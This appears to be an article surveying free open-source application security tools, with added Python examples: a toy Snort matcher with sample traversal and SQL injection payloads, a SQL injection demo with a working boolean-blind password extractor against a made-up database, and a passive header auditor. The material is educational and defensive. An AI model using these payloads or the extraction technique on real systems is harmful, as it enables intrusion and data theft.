
57 open source app sec tools: A guide to free application security software

Mike Perrow, Freelance writer

Read the updated version of this list: 47 powerful open-source app sec tools you should consider

You don't need to spend a lot of money to introduce high-power security into your application development and delivery agenda. This guide to open-source app sec tools is designed to help teams looking to invest in application security software understand what’s out there in the open-source space, and how to think about the choices. A subsequent guide to commercial app sec vendors will follow. 

Why do you need a guide to free app sec tools? Generally speaking, information about application security can be confusing, because websites typically present the advantages of products without clearly describing the class of solution being offered. This makes it difficult to compare one product to the next. Websites for open source projects typically provide very granular information about a specific tool, which requires the reader to already understand how and why a specific tool is used.

The value of open source app sec tools

Most open source projects are designed for app sec requirements at a smaller scale than commercial vendors tend to target. We believe this list of highly dedicated open source app sec providers should, nevertheless, become familiar to security enthusiasts seeking new, creative approaches to specific kinds of cyber threats.

Some of these open source projects are quite active and frequently updated with new capabilities; others, well, not so much, but they’re still worth checking out. Some of the more robust open source tools have been around since the dawn of the web; others are quite new, with growing hordes of followers on Twitter and elsewhere.

Note that a few of the listings here are free “community editions” of higher-grade commercial products. Also note that you can’t identify open source projects by their .org or .net suffixes anymore. As you’ll see, many use the .com convention, and lots of other URL conventions these days.

Andiparos

A fork of the famous Paros Proxy, an open source web application security assessment tool that gives penetration testers the ability to spider websites, analyze content, and intercept and modify requests. Like Paros itself, it is no longer actively developed.
Web: https://code.google.com/archive/p/andiparos

 

BackTrack

Often called a Linux-based penetration testing arsenal, this distribution came preconfigured with hundreds of security testing tools and scripts. It is no longer maintained: the same team replaced it with Kali Linux (listed below).
Web: http://www.backtrack-linux.org

 

BeEF

The Browser Exploitation Framework: an open source penetration testing tool that focuses on the web browser. Once a browser is "hooked" (for example, by an XSS flaw that loads BeEF's JavaScript), BeEF can run client-side attack modules against it.
Web: http://beefproject.com

 

Caja

Compiler for making third-party HTML, CSS and JavaScript safe to embed in a website. It uses an object-capability security model to allow for a wide range of flexible security policies.
Web: http://developers.google.com/caja

 

ClamAV

Open source antivirus engine for detecting trojans, viruses, malware and other malicious threats; commonly used to scan mail gateways and file uploads.
Web: http://clamav.net

 

DOM Snitch

Experimental Chrome extension that enables developers and testers to identify insecure practices commonly found in client-side code. Developers and testers can observe DOM modifications as they happen inside the browser without the need to step through JavaScript code with a debugger or pause the execution of their application.
Web: https://code.google.com/archive/p/domsnitch

 

Ettercap

Called "a comprehensive suite for man in the middle attacks... features sniffing of live connections, content filtering on the fly and many other interesting tricks."
Web: http://ettercap.github.io/ettercap

 

GoLismero

Free software framework for security testing.
Web: http://www.golismero.com

 

Google hacking database (GHDB)

Described by SecTools.org as "a gold mine for security researchers and penetration testers," this site is part of The Exploit Database, "a non-profit project that is provided as a public service by Offensive Security."
Web: https://www.exploit-db.com/google-hacking-database

 

Google application security tools

Google states that these tools "address a gap present in other open-source tools. These tools may require some minor tweaking or compilation to work on your systems." Some are included separately in this list.
Web: https://www.google.com/about/appsecurity/tools

 

Grabber

Small, simple open source web application scanner that can detect many common web vulnerabilities; designed for penetration testing of small sites rather than large-scale scanning.
Web: http://rgaucher.info/beta/grabber

 

Grendel

Grendel-Scan, an open source web application security scanner for finding security vulnerabilities; it also includes features that support manual penetration testing.
Web: https://sourceforge.net/projects/grendel

 

Gruyere

Called “a small, cheesy web application”, Gruyere lets users publish snippets of text and store assorted files. It is deliberately vulnerable: it contains multiple security bugs ranging from cross-site scripting and cross-site request forgery to information disclosure, denial of service, and remote code execution, and Google's accompanying codelab walks you through finding and fixing them. Run it only in an isolated environment, never on a host that matters.
Web: http://google-gruyere.appspot.com

 

Kali

Debian-based Linux penetration testing distribution from Offensive Security and the successor to BackTrack; ships with hundreds of security tools preinstalled.
Web: http://kali.org

 

Keyczar

Open source cryptographic toolkit designed to make it easier and safer for developers to use cryptography in their applications. It supports authentication and encryption with both symmetric and asymmetric keys and is designed to be open, extensible, and cross-platform. Note that Google has since deprecated Keyczar in favor of its Tink library, so new projects should look there.
Web: https://github.com/google/keyczar

 

Kismet

Wireless network detector, sniffer, and intrusion detection system. Kismet works predominately with Wi-Fi (IEEE 802.11) networks, but can be expanded via plug-ins to handle other network types.
Web: http://kismetwireless.org

 

Malwarebytes

Free (but not open source) endpoint malware scanner for Windows; the free edition is an on-demand scanner, with real-time protection reserved for the paid product.
Web: http://malwarebytes.org

 

Metasploit

Exploitation framework maintained by Rapid7. Metasploit Framework, the open source edition, provides exploit modules, payloads and auxiliary scanners for penetration testing; Metasploit Pro is the commercial product built on top of it.
Web: http://metasploit.com

 

ModSecurity

Open source web application firewall (WAF) engine, originally an Apache module and now also available for Nginx and IIS; commonly deployed with the OWASP ModSecurity Core Rule Set (CRS), which supplies the actual detection rules.
Web: http://modsecurity.org

 

Nagios

Monitors the entire IT infrastructure to ensure systems, applications, services, and business processes are functioning properly.
Web: http://nagios.org

 

Native Client (NaCl)

A technology for running native compiled code in the browser inside a sandbox. NaCl aims to keep the operating system portability and safety that people expect from web applications. Google has since deprecated Native Client in favor of WebAssembly.
Web: http://developer.chrome.com/native-client

 

Nikto2

Web server testing tool to find known vulnerable scripts, configuration mistakes and related security problems
Web: http://cirt.net/nikto2

 

Nmap

Network discovery and security auditing utility; its Nmap Scripting Engine (NSE) scripts can detect vulnerabilities, misconfigurations and other security-related information about network services.
Web: http://nmap.org

 

NoScript

Firefox add-on that provides extra protection for Firefox, SeaMonkey and other Mozilla-based browsers; it allows JavaScript, Java, Flash and other plugins to be executed only by trusted web sites of your choice.
Web: http://noscript.net

 

OpenSSH

Open source implementation of the SSH protocol: encrypted remote shell access (ssh), file transfer (scp, sftp) and port forwarding, which can also be used to tunnel insecure protocols through an SSH connection.
Web: http://www.openssh.com

 

OpenVAS

Open source vulnerability scanning suite, forked from Nessus when that product went closed source; now developed by Greenbone Networks.
Web: http://openvas.org

 

OSSEC

Host-based intrusion detection system (HIDS) that performs log analysis, file integrity checking, rootkit detection and active response.
Web: http://ossec.github.io

 

OWASP

A large catalog of open source security testing tools is listed at owasp.org.
Web: https://www.owasp.org/index.php/Appendix_A:_Testing_Tools

 

Packet Storm

Wide variety of vulnerability scanning and penetration testing tools available for download.
Web: http://packetstormsecurity.org/files/tags/scanner

 

Paros Proxy

Proxy-based web application security and vulnerability testing tool. Used to spider/crawl entire sites, then execute canned vulnerability scanner tests. Paros has not been maintained for years; see Zed Attack Proxy below for an actively developed fork.
Web: http://www.testingsecurity.com/paros_proxy

 

Powerfuzzer

HTTP protocol based application fuzzer based on many other Open Source fuzzers
Web: http://www.powerfuzzer.com

 

Ratproxy

Passive, semi-automated web application security audit proxy. Rather than actively attacking the target, it observes normal browsing traffic and flags issues. It is designed to overcome problems users usually face with other proxy tools during security audits, for example by telling CSS stylesheets apart from JavaScript code.
Web: https://code.google.com/archive/p/ratproxy

 

Secunia PSI

A free (but not open source) Windows tool that identifies out-of-date, vulnerable applications installed on personal PCs. Flexera has since discontinued Secunia PSI.
Web: http://learn.flexerasoftware.com/SVM-EVAL-Personal-Software-Inspector

 

Security Onion

Linux distribution for intrusion detection, network security monitoring, and log management
Web: http://blog.securityonion.net

 

Skipfish

Active web application security reconnaissance tool. It prepares an interactive sitemap for a site by carrying out a recursive crawl and dictionary-based probes, then annotates the map with the output of its security checks. Written in C with a custom HTTP stack, it is high performance, easy to use and reliable.
Web: https://code.google.com/archive/p/skipfish

 

Snort

Open-source, free and lightweight network intrusion detection system (NIDS) for UNIX derivatives and Windows
Web: http://snort.org
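Snort's rules are plain text signatures matched against traffic. The following is an added example, not part of the original article and not Snort's code: a tiny Python matcher for a subset of Snort's rule language (the header's destination port, `content` with `|hex|` bytes, `nocase` and `pcre`) run over constructed request payloads. The three rules and the six packets are written for this example and are not taken from any real ruleset or capture. The toy does none of the HTTP normalisation that Snort's `http_inspect` preprocessor performs, which is why the URL-encoded traversal request is deliberately missed; that gap is the point, since evasion by encoding is exactly what the preprocessor exists to close.

```python
import re
from dataclasses import dataclass, field

# Constructed rules in Snort's rule language, written for this example (not from any ruleset).
RULES = r'''
alert tcp any any -> any 80 (msg:"WEB sqlmap user agent"; content:"User-Agent|3a| sqlmap"; nocase; sid:1000001; rev:1;)
alert tcp any any -> any 80 (msg:"WEB /etc/passwd traversal"; content:"../"; pcre:"/\.\.\/(\.\.\/)*etc\/passwd/"; sid:1000002; rev:1;)
alert tcp any any -> any 80 (msg:"WEB UNION SELECT in request"; content:"UNION"; nocase; content:"SELECT"; nocase; sid:1000003; rev:1;)
'''

# Constructed (destination port, payload) pairs standing in for reassembled TCP streams.
PACKETS = [
    (80, b"GET /index.php?id=1 HTTP/1.1\r\nHost: shop.test\r\nUser-Agent: sqlmap/1.0\r\n\r\n"),
    (80, b"GET /download?file=../../../etc/passwd HTTP/1.1\r\nHost: shop.test\r\n\r\n"),
    (80, b"GET /item?id=1 UNION SELECT 1,2 HTTP/1.1\r\nHost: shop.test\r\n\r\n"),
    # URL-encoded traversal: missed below because this toy does no HTTP normalisation.
    (80, b"GET /download?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1\r\nHost: shop.test\r\n\r\n"),
    (443, b"GET / HTTP/1.1\r\nHost: shop.test\r\nUser-Agent: sqlmap/1.0\r\n\r\n"),  # wrong port
    (80, b"GET / HTTP/1.1\r\nHost: shop.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),  # benign
]

HEADER_RE = re.compile(
    r"^(?P<action>\w+)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)\s+->\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<body>.*)\)\s*$")
# One rule option: name, optional ':value' (quoted or bare), terminated by ';'.
OPTION_RE = re.compile(r'\s*(\w+)(?::\s*("(?:[^"\\]|\\.)*"|[^;]*))?\s*;')


@dataclass
class Rule:
    sid: int
    msg: str
    dport: str
    contents: list = field(default_factory=list)  # [[bytes, nocase], ...]
    pcres: list = field(default_factory=list)     # compiled bytes regexes


def decode_content(text):
    """Turn a Snort content string such as 'User-Agent|3a| sqlmap' into bytes."""
    out = bytearray()
    for i, seg in enumerate(text.split("|")):
        out += bytes.fromhex(seg) if i % 2 else seg.encode("latin-1")
    return bytes(out)


def compile_pcre(text):
    """Compile Snort's /pattern/flags form into a bytes regex (i, s, m flags only)."""
    pattern, _, flag_chars = text[1:].rpartition("/")
    flags = 0
    for ch in flag_chars:
        flags |= {"i": re.I, "s": re.S, "m": re.M}.get(ch, 0)
    return re.compile(pattern.encode("latin-1"), flags)


def parse_rules(text):
    """Parse 'alert' rules; unsupported options are ignored rather than rejected."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = HEADER_RE.match(line)
        if not m or m["action"] != "alert":
            continue
        rule = Rule(sid=0, msg="", dport=m["dport"])
        for name, value in OPTION_RE.findall(m["body"]):
            value = value.strip('"')
            if name == "msg":
                rule.msg = value
            elif name == "sid":
                rule.sid = int(value)
            elif name == "content":
                rule.contents.append([decode_content(value), False])
            elif name == "nocase" and rule.contents:
                rule.contents[-1][1] = True  # nocase modifies the preceding content
            elif name == "pcre":
                rule.pcres.append(compile_pcre(value))
        rules.append(rule)
    return rules


def rule_matches(rule, dport, payload):
    if rule.dport != "any" and rule.dport != str(dport):
        return False
    for needle, nocase in rule.contents:
        hay, n = (payload.lower(), needle.lower()) if nocase else (payload, needle)
        if n not in hay:
            return False
    return all(rx.search(payload) for rx in rule.pcres)


def scan(rules, packets):
    """Return [(packet_index, sid, msg)] for every rule that fires on each packet."""
    return [(i, r.sid, r.msg) for i, (dport, payload) in enumerate(packets)
            for r in parse_rules_cache(rules) if rule_matches(r, dport, payload)]


def parse_rules_cache(rules):
    """Accept either already-parsed Rule objects or raw rule text."""
    return parse_rules(rules) if isinstance(rules, str) else rules


if __name__ == "__main__":
    for idx, sid, msg in scan(RULES, PACKETS):
        print(f"packet {idx}: sid {sid} {msg}")
```

Packets 0, 1 and 2 trigger one rule each; packets 3 (encoded), 4 (port 443) and 5 (benign) trigger none. Real Snort also evaluates relative modifiers such as `distance` and `within`, flow state and the decoded HTTP buffers, none of which this matcher attempts.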

 

SonarQube

SonarQube (previously known as “Sonar”) is an open platform for managing code quality, covering what the project calls the seven axes of code quality; its rule sets include security-related checks alongside bug and maintainability rules.
Web: https://github.com/SonarSource/sonarqube

 

SQLMap

Penetration testing tool that automates the process of finding and exploiting SQL injection vulnerabilities in a website’s database, from detection through to data extraction and database takeover.
Web: http://sqlmap.org
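To make concrete what sqlmap automates, here is an added example (written for this article, not sqlmap's own code) in Python with the standard library's SQLite module. It puts a string-concatenated lookup next to its parameterised fix, then recovers a password through the vulnerable lookup using nothing but a yes/no oracle, which is sqlmap's boolean-based blind technique. The `users` table, its two rows and the function names are constructed for the example; the oracle assumes ASCII passwords, which is why the binary search runs over 0..127.

```python
import sqlite3


def make_db():
    """Constructed sample database for this example: two users in an in-memory SQLite DB."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("alice", "s3cr3t"), ("bob", "hunter2")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """Vulnerable: the user-supplied value is concatenated into the SQL text."""
    sql = "SELECT id, name FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, name):
    """Fixed: a bound parameter is always treated as data, never as SQL."""
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


def blind_extract_password(conn, user, max_len=32):
    """Recover users.password for `user` through the vulnerable lookup using only a
    true/false oracle (a row came back or it did not): boolean-based blind injection.
    Each character's code point is found by binary search, so about 7 queries per
    character instead of trying every candidate. Returns (password, query_count)."""
    queries = 0

    def oracle(condition):
        nonlocal queries
        queries += 1
        # Closes the original quote, appends our condition, then re-balances the quote.
        payload = f"{user}' AND ({condition}) AND '1'='1"
        return len(lookup_vulnerable(conn, payload)) > 0

    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # assumption: ASCII password characters
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(password, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        # Past the end of the string substr() yields '' and unicode('') is NULL, so the
        # equality probe fails and extraction stops.
        if lo == 0 or not oracle(f"unicode(substr(password, {pos}, 1)) = {lo}"):
            break
        recovered += chr(lo)
    return recovered, queries


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, "' OR '1'='1"))  # every row comes back
    print("fixed:     ", lookup_fixed(db, "' OR '1'='1"))       # nobody has that literal name
    pw, n = blind_extract_password(db, "alice")
    print(f"recovered alice's password {pw!r} with {n} boolean queries")
```

The same payload that dumps every row through `lookup_vulnerable` returns nothing through `lookup_fixed`, because the driver sends the value separately from the statement. sqlmap does the same character-by-character inference at scale, against many database engines and with time-based and error-based oracles when no visible true/false difference exists.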

 

Tcpdump

Called "a powerful command-line packet analyzer" on its website, this tool is still used by many as an alternative to the more resource-intensive Wireshark
Web: http://tcpdump.org

 

Vega

Web vulnerability scanner and testing platform; SQL injection, cross-site scripting, etc.
Web: https://subgraph.com/vega

 

W3AF

Web Application Attack and Audit Framework: an open source scanner with plugins for discovery, auditing (SQL injection, cross-site scripting and many other flaws) and exploitation.
Web: http://w3af.org

 

Wapiti

Web vulnerability scanner which lets you audit the security of your web applications. It performs black-box testing by scanning web pages and injecting data
Web: http://wapiti.sourceforge.net

 

Watcher

A Fiddler addon to assist penetration testers in passively finding Web app vulnerabilities 
Web: http://websecuritytool.codeplex.com
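Ratproxy (above) and Watcher share one idea: passive checks that send nothing to the target and instead inspect the responses a tester's browsing already produced. The following added example (not the code of either project) shows that style of check in Python over two constructed HTTP responses: cookies set without `Secure`, `HttpOnly` or `SameSite`, version disclosure in `Server`/`X-Powered-By`, and missing `Content-Security-Policy`, `X-Frame-Options`, `X-Content-Type-Options` and `Strict-Transport-Security` headers. The URLs, header values and finding messages are all made up for the example.

```python
# Constructed sample responses, hand-written for this example (not captured from any site).
SAMPLE_RESPONSES = {
    "https://example.test/login": (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: text/html; charset=utf-8\r\n"
        b"Set-Cookie: session=abc123; Path=/\r\n"
        b"X-Powered-By: PHP/5.6.40\r\n"
        b"\r\n"
        b"<html><body>login form</body></html>"
    ),
    "https://example.test/api/me": (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: application/json\r\n"
        b"Set-Cookie: token=xyz; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
        b"X-Content-Type-Options: nosniff\r\n"
        b"Strict-Transport-Security: max-age=31536000\r\n"
        b"\r\n"
        b'{"id": 1}'
    ),
}


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_line, [(name_lower, value)], body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def audit_response(url, raw):
    """Return a list of passive findings for one observed response; nothing is sent."""
    findings = []
    _, headers, _ = parse_response(raw)
    present = {name for name, _ in headers}
    content_type = next((v for n, v in headers if n == "content-type"), "")
    is_html = content_type.lower().startswith("text/html")
    over_tls = url.lower().startswith("https://")

    for name, value in headers:
        if name == "set-cookie":
            parts = [p.strip() for p in value.split(";")]
            cookie = parts[0].split("=", 1)[0]
            attrs = {p.lower() for p in parts[1:]}
            if over_tls and "secure" not in attrs:
                findings.append(f"cookie {cookie} set without Secure")
            if "httponly" not in attrs:
                findings.append(f"cookie {cookie} set without HttpOnly")
            if not any(a.startswith("samesite=") for a in attrs):
                findings.append(f"cookie {cookie} set without SameSite")
        elif name in ("x-powered-by", "server") and any(ch.isdigit() for ch in value):
            findings.append(f"{name} header discloses a software version: {value}")

    if is_html:  # browser-side protections only matter for pages a browser renders
        if "content-security-policy" not in present:
            findings.append("HTML response without Content-Security-Policy")
        if "x-frame-options" not in present:
            findings.append("HTML response without X-Frame-Options (clickjacking)")
    if "x-content-type-options" not in present:
        findings.append("missing X-Content-Type-Options: nosniff")
    if over_tls and "strict-transport-security" not in present:
        findings.append("HTTPS response without Strict-Transport-Security")
    return findings


def audit_all(responses):
    """Audit a {url: raw_response} mapping, as a proxy would after a browsing session."""
    return {url: audit_response(url, raw) for url, raw in responses.items()}


if __name__ == "__main__":
    for url, findings in audit_all(SAMPLE_RESPONSES).items():
        print(url)
        for finding in findings or ["no findings"]:
            print("  -", finding)
```

The login page yields eight findings and the JSON endpoint none. Checks like these are cheap precisely because they are passive, which is also their limit: they can only report on what the tester happened to visit, and they never learn whether a flag is exploitable.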

 

WATOBO

Tool for performing efficient (semi-automated) web application security audits; it works as an intercepting proxy with both passive and active checks.
Web: http://watobo.sourceforge.net/index.html

 

WebScarab

Java-based, portable security framework for analyzing web applications that use HTTP or HTTPS; it offers several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy.
Web: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project

 

Websecurify

Web application security scanner from GNUCITIZEN; the current product is commercial (see the Commercial vendor list).
Web: 

 

Wfuzz

A freely available open source tool for web application penetration testing. It can be used to brute force GET and POST parameters for testing against various kinds of injections like SQL, XSS, LDAP, and many others
Web: http://code.google.com/p/wfuzz

 

SensePost

Vulnerability tools for devices, networks, and apps. Tools include autoDANE, reGeorg, Jack, and the SensePost Maltego Toolset
Web: http://sensepost.com

 

Wireshark

Open source network protocol analyzer used for penetration testing and packet-level monitoring; lets you view traffic in as much detail as you want, follow network streams and find problems.
Web: http://wireshark.org

 

Zed Attack Proxy

Also known as ZAP. Open source intercepting proxy that began as a fork of the badly out-of-date Paros Proxy and has been developed well beyond it. Fairly powerful for manual testing, and contains automated scanning features.
Web: https://www.owasp.org

What did we miss?

Are there open source application security providers that we missed? We think of this as a work in progress, so if you believe there are tools that should be added to this list, please let us know in the comments section below.